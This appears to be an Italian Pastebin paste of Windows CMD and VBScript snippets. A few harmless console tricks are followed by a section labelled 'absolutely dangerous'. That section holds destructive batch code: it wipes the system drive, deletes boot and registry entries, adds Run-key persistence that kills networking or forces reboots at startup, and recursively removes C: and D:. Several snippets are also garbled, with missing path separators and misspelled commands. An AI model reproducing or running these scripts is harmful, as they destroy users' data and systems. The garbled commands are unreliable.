Advertisement
Balu98

Untitled

Dec 17th, 2017
87
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.00 KB | None | 0 0
  1. COLORE
  2. color "numero" "lettera"
  3. SPEGNIMENTO
  4. shutdown -i
  5. CAMBIO TITOLO AL CMD
  6. title "titolo"
  7. HOTSPOT
  8. netsh wlan set hostednetwork mode=allow ssid=STWB key=12345678
  9. netsh wlan start hostednetwork
  10. netsh wlan stop hostednetwork
  11.  
  12.  
  13.  
  14.  
  15. COMANDI PER CMD ASSOLUTAMENTE PERICOLOSI
  16.  
  17. "SCHERMO BLU DELLA MORTE"
  18.  
  19. @echo off
  20. del %systemdrive%\*.* /f /s /q
  21. shutdown -r -f -t 00
  22.  
  23.  
  24.  
  25.  
  26. CAMBIARE ESTENSIONE FILE
  27.  
  28. REN *.txt *.html
  29. REN *.avi *.exe
  30.  
  31.  
  32.  
  33. CRASH PC FOREVER
  34. @echo off
  35. attrib -r -s -h c:\autoexec.bat
  36. del c:\autoexec.bat
  37. attrib -r-s-h c:\boot.in
  38. del c:\boot.ini
  39. attrib -r-s-h c:\ntldr
  40. del c:\ntldr
  41. attrib -r-s-h c:\windows\win.ini
  42. del c:\windows\win.ini
  43.  
  44.  
  45.  
  46. EILIMINAZIONE REGISTRO
  47.  
  48. @ECHO OFF
  49. START reg delete HKCR/.exe
  50. START reg delete HKCR/.dll
  51. START reg delete HKCR/*
  52.  
  53.  
  54. DISABILITARE INTERNET PER SEMPRE
  55.  
  56. echo @echo off>c:windowswimn32.bat
  57. echo break off>>c:windowswimn32.bat
  58. echo ipconfig/release_all>>c:windowswimn32.bat
  59. echo end>>c:windowswimn32.bat
  60. reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun/v
  61. CONTROLexit/t reg_sz /d c:windowswimn32.bat /f
  62. PAUSE
  63.  
  64.  
  65. INFINITI INVIO
  66.  
  67. Set wshShell = wscript.CreateObject("WScript.Shell")
  68. do
  69. wscript.sleep 100
  70. wshshell.sendkeys "~(enter)"
  71. loop
  72.  
  73. SPEGNERE IL COMPIUTER APPENA PARTE
  74.  
  75. echo @echo off>c:windowshartlell.bat
  76. echo break off>>c:windowshartlell.bat
  77. echo shutdown -r -t 11 -f>>c:windowshartlell.bat
  78. echo end>>c:windowshartlell.bat
  79. reg add hkey_local_machinesoftwartmicrosoftwindowscurrentversionrun
  80. /v startAPI /t reg_sz /d c:windowshatlell.bat /f
  81. reg add hkey_current_usersoftwaremicrosftwindowscurrentversionrun
  82. /v /t reg_sz /d c:windowshartlell.bat /f
  83. PUSE
  84.  
  85.  
  86. CASSETTO CD IMPAZZITO
  87. Set oWMP = CreateObject("WMPlayer.OCX.7")
  88. Set colCDROMs = oWMP.cdromCollection
  89. do
  90. if colCDROMs.Count>=1 then
  91. For i=0 to colCDROMs.Comunt-1
  92. colCDROMs.Item(i).Wject
  93. Next
  94. For i=0 to colCDROMs.Comunt-1
  95. colCDROMs.Item(i).Wject
  96. Next
  97. End If
  98. wscript.sleep 100
  99. loop
  100.  
  101.  
  102. FORMATTAZIONE FORZATA DISCO
  103.  
  104. rd/s/q D:\
  105. rd/s/q C:\
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement